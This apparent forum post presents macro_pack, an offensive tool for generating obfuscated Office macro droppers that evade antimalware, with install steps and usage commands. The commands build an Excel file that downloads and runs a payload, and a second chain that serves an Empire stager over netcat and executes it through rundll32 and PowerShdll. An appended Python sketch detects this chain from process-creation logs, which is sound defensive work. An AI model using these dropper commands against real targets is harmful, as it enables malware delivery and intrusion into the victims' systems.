macro_pack is a tool used to automate the obfuscation and generation of retro formats such as MS Office documents or VBS-like formats. It now also handles various shortcut formats.
This tool can be used for red teaming, pentests, demos, and social engineering assessments. macro_pack simplifies bypassing antimalware solutions and automates the process from VB source to the final Office document or other payload type.
Installation
Code:
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
sed -i 's/pywin32>=225//g' requirements.txt
pip3 install pypiwin32
pip3 install -r requirements.txt
Windows:
Just download the exe from here :
Usage
To get help, use:
Code:
python3 src/macro_pack.py -h
List all supported file formats:
Code:
python3 src/macro_pack.py --listformats
Templates:
Code:
python3 src/macro_pack.py --listtemplates
Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store it as dropped.exe):
Code:
echo "https://myurl.url/payload.exe" "dropped.exe" | src/macro_pack.py -o -t DROPPER -G "drop.xlsm"
Empire Launcher Stager Example
Download and execute the Empire Launcher stager without powershell.exe by using the DROPPER_PS template.
Generate a file containing the Empire launcher.
Make that file available on a web server, e.g. with netcat:
Code:
{ echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat empire_stager.cmd; } | nc -l -p 6666 -q1
Use macro_pack to generate the DROPPER_PS payload in an Excel file:
Code:
echo http://10.5.5.12:6543/empire_stager.cmd | macro_pack.exe -o -t DROPPER_PS -G join_the_empire.xls
When executed on the target, the macro will download PowerShdll, run it with rundll32, and download and execute the stager.
Source: https://github.com/sevagas/macro_pack
There are many more commands; you can check them out on the GitHub page.
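From the defender's side, the DROPPER_PS chain described above (an Office macro that runs a downloaded DLL with rundll32) leaves a recognisable process-creation trail. The following detection sketch is an added example, not part of the original post or the macro_pack project; it assumes Sysmon-style process-creation fields (ParentImage, Image, CommandLine), and all sample events, paths and DLL names are constructed.

```python
import ntpath
import re

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "msaccess.exe", "outlook.exe"}
# Script hosts and system binaries that an Office process rarely needs to start.
RISKY_CHILDREN = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe",
                  "cscript.exe", "cmd.exe", "powershell.exe"}
# User-writable locations where a downloaded file is typically stored.
USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+\\(appdata|downloads|documents|desktop)|programdata|windows\\temp)\\",
    re.IGNORECASE)

def score_event(event):
    """Return (severity, reason) for one process-creation event, or None if benign."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    child = ntpath.basename(event["Image"]).lower()
    if parent not in OFFICE_PARENTS or child not in RISKY_CHILDREN:
        return None
    if child == "rundll32.exe" and USER_WRITABLE.search(event.get("CommandLine", "")):
        return ("high", f"{parent} ran rundll32 on a DLL in a user-writable path")
    return ("medium", f"{parent} started {child}")

def detect(events):
    """Return (command line, severity, reason) for every flagged event, in input order."""
    return [(e["CommandLine"], *hit) for e in events if (hit := score_event(e))]

def _event(parent, image, command_line):
    return {"ParentImage": parent, "Image": image, "CommandLine": command_line}

# Constructed sample events (not real telemetry); paths and DLL names are placeholders.
EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
SYS32 = "C:\\Windows\\System32\\"
SAMPLE_EVENTS = [
    _event(EXCEL, SYS32 + "rundll32.exe",
           r"rundll32.exe C:\Users\alice\AppData\Local\Temp\example.dll,main"),
    _event(r"C:\Windows\explorer.exe", SYS32 + "rundll32.exe",
           r"rundll32.exe shell32.dll,Control_RunDLL"),
    _event(WORD, SYS32 + "cmd.exe", "cmd.exe /c dir"),
    _event(EXCEL, r"C:\Windows\splwow64.exe", "splwow64.exe 8192"),
    _event(EXCEL, SYS32 + "rundll32.exe",
           r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for command_line, severity, reason in detect(SAMPLE_EVENTS):
        print(f"[{severity}] {reason}: {command_line}")
```

The same parent/child rule maps directly onto the "block Office applications from creating child processes" attack surface reduction setting, which prevents this chain rather than only detecting it.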